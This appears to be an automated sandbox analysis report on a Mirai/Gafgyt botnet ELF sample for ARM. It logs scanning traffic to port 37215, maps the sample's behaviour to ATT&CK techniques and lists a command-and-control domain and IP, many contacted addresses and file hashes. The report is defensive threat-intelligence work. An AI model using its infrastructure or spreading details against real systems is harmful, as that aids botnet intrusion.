                Source: unknownNetwork traffic detected: HTTP traffic on port 45248 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 37106 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 34678 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 55794 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 37882 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 37188 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 38006 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 54014 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 48658 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 45890 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 38922 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 38536 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 39312 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 59902 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 33096 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 32892 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 39040 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 53144 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 59416 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 50634 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 55940 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 39730 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 46914 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 47594 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 51476 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 37764 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 41928 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 45906 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 44620 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 34044 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 58336 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 58446 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 39716 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 45356 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 38324 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 53602 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 37938 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 44124 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 47966 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 45960 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 52732 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 55958 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 38118 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 49236 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 50758 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 52262 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 51664 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 37624 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 34650 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 51488 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 52856 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 41984 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 41728 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 43354 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 48516 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 35368 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 49644 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 38798 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 41296 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 60248 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 53072 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 48678 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 48914 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 40288 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 45652 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 52678 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 47470 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 58838 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 60448 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 45872 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 48036 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 51766 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 35630 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 59444 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 55554 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 45778 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 48768 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 43686 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 51668 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 53628 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 40780 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 56812 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 45754 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 46796 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 60962 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 46032 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 41238 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 50902 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 44986 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 40996 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 39956 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 46410 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 57606 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 48138 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 49806 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 34678 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 59454 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 59058 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 51990 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 40730 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 51162 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 51756 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 57074 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 55592 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 32804 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 47368 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 43648 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 56380 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 49804 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 55382 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 33676 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 48404 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 56320 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 60010 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 47738 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 50890 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 35822 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 36732 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 56232 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 40912 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 60644 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 56258 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 42462 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 42988 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 36354 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 34890 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 43276 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 43958 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 33682 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 37026 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 37668 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 36314 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 47714 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 37130 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 47914 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 49138 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 50906 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 34980 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 45216 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 39562 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 54902 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 53592 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 38972 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 59860 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 38830 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 45828 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 46990 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 48532 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 37808 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 43902 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 46172 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 49580 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 37386 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 44582 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 56146 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 38682 -> 37215
                Source: /tmp/WIwTo1UTMq.elf (PID: 5525)Queries kernel information via 'uname': Jump to behavior
                Source: WIwTo1UTMq.elf, 5525.1.00007ffeba087000.00007ffeba0a8000.rw-.sdmpBinary or memory string: [USx86_64/usr/bin/qemu-arm/tmp/WIwTo1UTMq.elfSUDO_USER=saturninoPATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/snap/binDISPLAY=:1.0XAUTHORITY=/run/user/1000/gdm/XauthoritySUDO_UID=1000TERM=xterm-256colorCOLORTERM=truecolorLOGNAME=rootUSER=rootLANG=en_US.UTF-8SUDO_COMMAND=/bin/bashHOME=/rootMAIL=/var/mail/rootSUDO_GID=1000SHELL=/bin/bash/tmp/WIwTo1UTMq.elf
                Source: WIwTo1UTMq.elf, 5525.1.000055b56fbe0000.000055b56fd2f000.rw-.sdmpBinary or memory string: U!/etc/qemu-binfmt/arm
                Source: WIwTo1UTMq.elf, 5525.1.000055b56fbe0000.000055b56fd2f000.rw-.sdmpBinary or memory string: /etc/qemu-binfmt/arm
                Source: WIwTo1UTMq.elf, 5525.1.00007ffeba087000.00007ffeba0a8000.rw-.sdmpBinary or memory string: /usr/bin/qemu-arm

                Stealing of Sensitive Information

                barindex
                Source: Yara matchFile source: WIwTo1UTMq.elf, type: SAMPLE
                Source: Yara matchFile source: 5525.1.00007f1cf8017000.00007f1cf802f000.r-x.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: WIwTo1UTMq.elf PID: 5525, type: MEMORYSTR

                Remote Access Functionality

                barindex
                Source: Yara matchFile source: WIwTo1UTMq.elf, type: SAMPLE
                Source: Yara matchFile source: 5525.1.00007f1cf8017000.00007f1cf802f000.r-x.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: WIwTo1UTMq.elf PID: 5525, type: MEMORYSTR
                ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                Gather Victim Identity InformationAcquire InfrastructureValid AccountsWindows Management InstrumentationPath InterceptionPath Interception1
                Masquerading
                1
                OS Credential Dumping
                11
                Security Software Discovery
                Remote ServicesData from Local System11
                Non-Standard Port
                Exfiltration Over Other Network MediumAbuse Accessibility Features
                CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization ScriptsBoot or Logon Initialization Scripts1
                Indicator Removal
                LSASS MemoryApplication Window DiscoveryRemote Desktop ProtocolData from Removable Media2
                Non-Application Layer Protocol
                Exfiltration Over BluetoothNetwork Denial of Service
                Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)Obfuscated Files or InformationSecurity Account ManagerQuery RegistrySMB/Windows Admin SharesData from Network Shared Drive2
                Application Layer Protocol
                Automated ExfiltrationData Encrypted for Impact
                No configs have been found
                Hide Legend

                Legend:

                • Process
                • Signature
                • Created File
                • DNS/IP Info
                • Is Dropped
                • Number of created Files
                • Is malicious
                • Internet
                behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1483124 Sample: WIwTo1UTMq.elf Startdate: 26/07/2024 Architecture: LINUX Score: 100 21 209.42.232.104, 14150, 37215 PRIVATESYSTEMSUS Netherlands 2->21 23 157.117.193.179, 14150, 37215 DOCOMONTTDOCOMOINCJP Japan 2->23 25 99 other IPs or domains 2->25 27 Malicious sample detected (through community Yara rule) 2->27 29 Antivirus / Scanner detection for submitted sample 2->29 31 Yara detected Mirai 2->31 33 3 other signatures 2->33 8 WIwTo1UTMq.elf 2->8         started        signatures3 process4 process5 10 WIwTo1UTMq.elf 8->10         started        process6 12 WIwTo1UTMq.elf 10->12         started        15 WIwTo1UTMq.elf 10->15         started        17 WIwTo1UTMq.elf 10->17         started        19 WIwTo1UTMq.elf 10->19         started        signatures7 35 Manipulation of devices in /dev 12->35 37 Deletes system log files 12->37

                This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                windows-stand
                SourceDetectionScannerLabelLink
                WIwTo1UTMq.elf100%AviraEXP/ELF.Gafgyt.X
                No Antivirus matches
                No Antivirus matches
                SourceDetectionScannerLabelLink
                http://schemas.xmlsoap.org/soap/encoding/0%URL Reputationsafe
                http://schemas.xmlsoap.org/soap/envelope/0%URL Reputationsafe
                NameIPActiveMaliciousAntivirus DetectionReputation
                cyberbotne.stresse.live
                94.156.71.55
                truetrue
                  unknown
                  NameSourceMaliciousAntivirus DetectionReputation
                  http://schemas.xmlsoap.org/soap/encoding/WIwTo1UTMq.elffalse
                  • URL Reputation: safe
                  unknown
                  http://schemas.xmlsoap.org/soap/envelope/WIwTo1UTMq.elffalse
                  • URL Reputation: safe
                  unknown
                  • No. of IPs < 25%
                  • 25% < No. of IPs < 50%
                  • 50% < No. of IPs < 75%
                  • 75% < No. of IPs
                  IPDomainCountryFlagASNASN NameMalicious
                  200.75.214.4
                  unknownPanama
                  18809CableOndaPAfalse
                  121.222.108.44
                  unknownAustralia
                  1221ASN-TELSTRATelstraCorporationLtdAUfalse
                  25.199.87.19
                  unknownUnited Kingdom
                  7922COMCAST-7922USfalse
                  40.180.184.242
                  unknownUnited States
                  4249LILLY-ASUSfalse
                  157.84.5.19
                  unknownUnited Kingdom
                  2907SINET-ASResearchOrganizationofInformationandSystemsNfalse
                  41.179.39.120
                  unknownEgypt
                  24863LINKdotNET-ASEGfalse
                  197.172.14.122
                  unknownSouth Africa
                  37168CELL-CZAfalse
                  74.3.84.87
                  unknownUnited States
                  18566MEGAPATH5-USfalse
                  212.191.184.119
                  unknownPoland
                  16283LODMAN-AS2MetropolitanAreaNetworkLODMANPLfalse
                  179.190.234.189
                  unknownBrazil
                  28220CABOSERVICOSDETELECOMUNICACOESLTDABRfalse
                  41.225.14.115
                  unknownTunisia
                  31245ATI-ISPTNfalse
                  194.59.240.235
                  unknownCzech Republic
                  29321CENTRONETASCzechRepublicCZfalse
                  12.78.154.49
                  unknownUnited States
                  7018ATT-INTERNET4USfalse
                  197.204.101.59
                  unknownAlgeria
                  36947ALGTEL-ASDZfalse
                  194.227.35.222
                  unknownUnited Kingdom
                  3352TELEFONICA_DE_ESPANAESfalse
                  159.0.13.117
                  unknownSaudi Arabia
                  25019SAUDINETSTC-ASSAfalse
                  104.168.36.68
                  unknownUnited States
                  36352AS-COLOCROSSINGUSfalse
                  157.51.155.77
                  unknownIndia
                  55836RELIANCEJIO-INRelianceJioInfocommLimitedINfalse
                  221.213.227.137
                  unknownChina
                  4837CHINA169-BACKBONECHINAUNICOMChina169BackboneCNfalse
                  209.42.232.104
                  unknownNetherlands
                  63410PRIVATESYSTEMSUStrue
                  86.27.49.44
                  unknownUnited Kingdom
                  5089NTLGBfalse
                  40.69.41.195
                  unknownUnited States
                  8075MICROSOFT-CORP-MSN-AS-BLOCKUSfalse
                  41.24.86.0
                  unknownSouth Africa
                  36994Vodacom-VBZAfalse
                  41.253.208.49
                  unknownLibyan Arab Jamahiriya
                  21003GPTC-ASLYfalse
                  71.202.23.19
                  unknownUnited States
                  7922COMCAST-7922USfalse
                  109.56.167.33
                  unknownSweden
                  44034HI3GSEfalse
                  157.33.98.8
                  unknownIndia
                  55836RELIANCEJIO-INRelianceJioInfocommLimitedINfalse
                  69.139.91.110
                  unknownUnited States
                  7922COMCAST-7922USfalse
                  176.41.36.87
                  unknownTurkey
                  34984TELLCOM-ASTRfalse
                  122.130.34.201
                  unknownJapan2518BIGLOBEBIGLOBEIncJPfalse
                  110.68.87.97
                  unknownKorea Republic of
                  4766KIXS-AS-KRKoreaTelecomKRfalse
                  142.91.62.19
                  unknownUnited States
                  395954LEASEWEB-USA-LAX-11USfalse
                  195.180.12.62
                  unknownGermany
                  6659NEXINTO-DEfalse
                  152.2.11.65
                  unknownUnited States
                  36850UNC-CHUSfalse
                  157.180.38.231
                  unknownSweden
                  22192SSHENETUSfalse
                  77.205.250.234
                  unknownFrance
                  15557LDCOMNETFRfalse
                  72.134.136.90
                  unknownUnited States
                  20001TWC-20001-PACWESTUSfalse
                  14.232.223.43
                  unknownViet Nam
                  45899VNPT-AS-VNVNPTCorpVNfalse
                  64.157.199.240
                  unknownUnited States
                  3064AFFINITY-FTLUSfalse
                  13.157.100.206
                  unknownUnited States
                  7018ATT-INTERNET4USfalse
                  126.160.102.140
                  unknownJapan17676GIGAINFRASoftbankBBCorpJPfalse
                  91.12.82.221
                  unknownGermany
                  3320DTAGInternetserviceprovideroperationsDEfalse
                  197.31.187.184
                  unknownTunisia
                  37492ORANGE-TNfalse
                  20.91.156.206
                  unknownUnited States
                  8075MICROSOFT-CORP-MSN-AS-BLOCKUSfalse
                  179.172.125.28
                  unknownBrazil
                  26599TELEFONICABRASILSABRfalse
                  197.140.232.133
                  unknownAlgeria
                  36891ICOSNET-ASDZfalse
                  197.187.29.153
                  unknownTanzania United Republic of
                  37133airtel-tz-asTZfalse
                  180.234.22.83
                  unknownSaudi Arabia
                  25019SAUDINETSTC-ASSAfalse
                  197.102.171.175
                  unknownSouth Africa
                  3741ISZAfalse
                  169.128.203.58
                  unknownUnited States
                  37611AfrihostZAfalse
                  41.35.35.156
                  unknownEgypt
                  8452TE-ASTE-ASEGfalse
                  207.135.172.15
                  unknownUnited States
                  16399FIRSTCOMM-AS2USfalse
                  41.8.37.25
                  unknownSouth Africa
                  29975VODACOM-ZAfalse
                  98.243.159.76
                  unknownUnited States
                  7922COMCAST-7922USfalse
                  197.128.22.119
                  unknownMorocco
                  6713IAM-ASMAfalse
                  97.96.217.253
                  unknownUnited States
                  33363BHN-33363USfalse
                  76.145.253.123
                  unknownUnited States
                  7922COMCAST-7922USfalse
                  149.200.53.160
                  unknownHungary
                  5483MAGYAR-TELEKOM-MAIN-ASMagyarTelekomNyrtHUfalse
                  41.179.39.139
                  unknownEgypt
                  24863LINKdotNET-ASEGfalse
                  157.107.251.188
                  unknownJapan4685ASAHI-NETAsahiNetJPfalse
                  123.86.39.132
                  unknownChina
                  9394CTTNETChinaTieTongTelecommunicationsCorporationCNfalse
                  197.211.66.65
                  unknownSouth Africa
                  29918IMPOL-ASNZAfalse
                  104.104.219.127
                  unknownUnited States
                  6147TelefonicadelPeruSAAPEfalse
                  41.189.87.94
                  unknownSouth Africa
                  37179AFRICAINXZAfalse
                  176.199.129.147
                  unknownGermany
                  6830LIBERTYGLOBALLibertyGlobalformerlyUPCBroadbandHoldingfalse
                  62.242.237.32
                  unknownDenmark
                  3292TDCTDCASDKfalse
                  157.9.186.14
                  unknownJapan4837CHINA169-BACKBONECHINAUNICOMChina169BackboneCNfalse
                  165.70.198.4
                  unknownUnited States
                  29885UCHHS-ASUSfalse
                  27.132.246.59
                  unknownJapan10013FBDCFreeBitCoLtdJPfalse
                  41.76.191.250
                  unknownKenya
                  37225NETWIDEZAfalse
                  31.16.54.28
                  unknownGermany
                  31334KABELDEUTSCHLAND-ASDEfalse
                  133.173.129.199
                  unknownJapan2497IIJInternetInitiativeJapanIncJPfalse
                  41.15.19.16
                  unknownSouth Africa
                  29975VODACOM-ZAfalse
                  157.85.230.2
                  unknownAustralia
                  7575AARNET-AS-APAustralianAcademicandResearchNetworkAARNefalse
                  41.102.150.114
                  unknownAlgeria
                  36947ALGTEL-ASDZfalse
                  189.166.10.196
                  unknownMexico
                  8151UninetSAdeCVMXfalse
                  197.240.45.191
                  unknownunknown
                  37705TOPNETTNfalse
                  69.254.187.221
                  unknownUnited States
                  7922COMCAST-7922USfalse
                  183.13.94.217
                  unknownChina
                  4134CHINANET-BACKBONENo31Jin-rongStreetCNfalse
                  201.185.125.202
                  unknownColombia
                  13489EPMTelecomunicacionesSAESPCOfalse
                  12.227.62.93
                  unknownUnited States
                  36105BBT-ISPUSfalse
                  115.231.119.15
                  unknownChina
                  4134CHINANET-BACKBONENo31Jin-rongStreetCNfalse
                  213.254.174.222
                  unknownUnited Kingdom
                  8897KCOM-SPNService-ProviderNetworkex-MistralGBfalse
                  157.222.228.80
                  unknownUnited States
                  4704SANNETRakutenMobileIncJPfalse
                  152.41.70.129
                  unknownUnited States
                  22854CATAWBA-COLLEGEUSfalse
                  211.195.208.158
                  unknownKorea Republic of
                  10056HDMF-ASHyundaiMarinFireInsuranceKRfalse
                  197.205.198.184
                  unknownAlgeria
                  36947ALGTEL-ASDZfalse
                  213.213.172.182
                  unknownSwitzerland
                  15600FINECOMQuicklineAGCHfalse
                  84.216.103.106
                  unknownSweden
                  2119TELENOR-NEXTELTelenorNorgeASNOfalse
                  197.100.207.216
                  unknownSouth Africa
                  3741ISZAfalse
                  67.66.79.207
                  unknownUnited States
                  7018ATT-INTERNET4USfalse
                  157.21.250.105
                  unknownUnited States
                  53446EVMSUSfalse
                  23.45.221.2
                  unknownUnited States
                  16625AKAMAI-ASUSfalse
                  60.249.240.2
                  unknownTaiwan; Republic of China (ROC)
                  3462HINETDataCommunicationBusinessGroupTWfalse
                  197.191.86.186
                  unknownGhana
                  37140zain-asGHfalse
                  134.158.173.37
                  unknownFrance
                  789IN2P3IN2P3AutonomousSystemEUfalse
                  157.117.193.179
                  unknownJapan9605DOCOMONTTDOCOMOINCJPtrue
                  128.139.168.144
                  unknownIsrael
                  378MACHBA-ASILANILfalse
                  183.151.207.169
                  unknownChina
                  4134CHINANET-BACKBONENo31Jin-rongStreetCNfalse
                  210.152.164.26
                  unknownJapan2554IDCF2554IDCFrontierIncJPfalse
                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                  157.51.155.77HYeyfkaF8T.elfGet hashmaliciousMirai, MoobotBrowse
                    wXK7v8SS6P.elfGet hashmaliciousMiraiBrowse
                      197.204.101.59arm7.elfGet hashmaliciousMirai, MoobotBrowse
                        bok.arm5.elfGet hashmaliciousMiraiBrowse
                          ak.arm4-20220923-1454.elfGet hashmaliciousMiraiBrowse
                            x86_64-20220922-1222.elfGet hashmaliciousMirai, MoobotBrowse
                              8UoSNa8TSmGet hashmaliciousMiraiBrowse
                                157.84.5.19K1l26z8zaL.elfGet hashmaliciousMirai, MoobotBrowse
                                  41.179.39.120arm.elfGet hashmaliciousMirai, MoobotBrowse
                                    197.172.14.122ZSlHX40Um2.elfGet hashmaliciousMirai, OkiruBrowse
                                      Aew6gCjRif.elfGet hashmaliciousMirai, MoobotBrowse
                                        41.225.14.115x86Get hashmaliciousMiraiBrowse
                                          No context
                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                          ASN-TELSTRATelstraCorporationLtdAUxd.arm7.elfGet hashmaliciousMiraiBrowse
                                          • 1.156.62.201
                                          ppc.elfGet hashmaliciousMiraiBrowse
                                          • 120.147.132.32
                                          spc.elfGet hashmaliciousMiraiBrowse
                                          • 203.40.201.204
                                          LisectAVT_2403002B_302.exeGet hashmaliciousBdaejec, EmotetBrowse
                                          • 110.145.77.103
                                          arm7.elfGet hashmaliciousMiraiBrowse
                                          • 144.140.78.246
                                          LisectAVT_2403002C_48.dllGet hashmaliciousQbotBrowse
                                          • 110.142.205.182
                                          94.156.8.9-skid.x86_64-2024-07-23T17_40_08.elfGet hashmaliciousMirai, MoobotBrowse
                                          • 139.163.94.0
                                          yIRn1ZmsQF.elfGet hashmaliciousUnknownBrowse
                                          • 121.209.19.152
                                          Rx1EfzuTh3.elfGet hashmaliciousUnknownBrowse
                                          • 144.130.17.139
                                          chfIV0loR4.elfGet hashmaliciousUnknownBrowse
                                          • 203.53.75.235
                                          CableOndaPAl5EsscvvPL.elfGet hashmaliciousMiraiBrowse
                                          • 190.140.151.61
                                          UDxMi3I3lO.exeGet hashmaliciousPureLog Stealer, SystemBCBrowse
                                          • 200.90.133.79
                                          TGYj8HxqY9.elfGet hashmaliciousMiraiBrowse
                                          • 181.197.167.62
                                          3CMCBTr1Bk.elfGet hashmaliciousMiraiBrowse
                                          • 190.141.69.37
                                          ZXZMRvEA9M.elfGet hashmaliciousMiraiBrowse
                                          • 181.197.167.84
                                          ACKpfvO313.elfGet hashmaliciousMiraiBrowse
                                          • 190.219.200.202
                                          L6i3RnSvpp.elfGet hashmaliciousMirai, Gafgyt, OkiruBrowse
                                          • 190.140.175.25
                                          rzfcEvDxkx.elfGet hashmaliciousUnknownBrowse
                                          • 190.140.104.244
                                          cVxP229sNF.elfGet hashmaliciousUnknownBrowse
                                          • 200.46.24.6
                                          SXfiF4NeaQ.elfGet hashmaliciousMiraiBrowse
                                          • 190.141.57.211
                                          COMCAST-7922USfile.exeGet hashmaliciousVidarBrowse
                                          • 73.62.1.179
                                          xd.mips64.elfGet hashmaliciousUnknownBrowse
                                          • 73.47.225.80
                                          xd.arm7.elfGet hashmaliciousMiraiBrowse
                                          • 68.49.17.231
                                          LisectAVT_2403002A_73.exeGet hashmaliciousFareitBrowse
                                          • 71.192.41.219
                                          LisectAVT_2403002A_73.exeGet hashmaliciousFareitBrowse
                                          • 71.192.41.219
                                          m68k.elfGet hashmaliciousMiraiBrowse
                                          • 96.79.106.150
                                          mpsl.elfGet hashmaliciousMiraiBrowse
                                          • 74.24.119.207
                                          ppc.elfGet hashmaliciousMiraiBrowse
                                          • 67.187.231.251
                                          sh4.elfGet hashmaliciousMiraiBrowse
                                          • 174.52.32.64
                                          spc.elfGet hashmaliciousMiraiBrowse
                                          • 73.52.142.147
                                          No context
                                          No context
                                          No created / dropped files found
                                          File type:ELF 32-bit LSB executable, ARM, EABI4 version 1 (SYSV), statically linked, with debug_info, not stripped
                                          Entropy (8bit):5.89651934765297
                                          TrID:
                                          • ELF Executable and Linkable format (generic) (4004/1) 100.00%
                                          File name:WIwTo1UTMq.elf
                                          File size:157'189 bytes
                                          MD5:88e66d3ffdb78ac36dec93f81f898ad1
                                          SHA1:70383254c1f54b1401ba28ca982cc08b8a8f8cc5
                                          SHA256:023a49b27d0b741a27487cc730e2289da4170336dc2c106db22e8fa3864d3c02
                                          SHA512:0a00edfdac538586177dedb64df0fb28421b05220ae9a050c158ccdae929fab537637aa6011909793b428c34cb8fdbd630ef2471b563b5c584a621fe14e52b3e
                                          SSDEEP:3072:HNaEkEJoa9niU5yae9xfKqF6bBtUKKRsSY6rOYLYM/9iAn9Q:HNa09iWyae9xfKq2BifdY6rOY8M/9Z9Q
                                          TLSH:A6E33B46EA818B13C4D61776BAAF424533239B64D3DB33069928BFB43F8779E0E63505
                                          File Content Preview:.ELF..............(.........4...p.......4. ...(........p.u...........................................w...w...............w...w...w..0....................w...w...w..................Q.td..................................-...L..................@-.,@...0....S

                                          ELF header

                                          Class:ELF32
                                          Data:2's complement, little endian
                                          Version:1 (current)
                                          Machine:ARM
                                          Version Number:0x1
                                          Type:EXEC (Executable file)
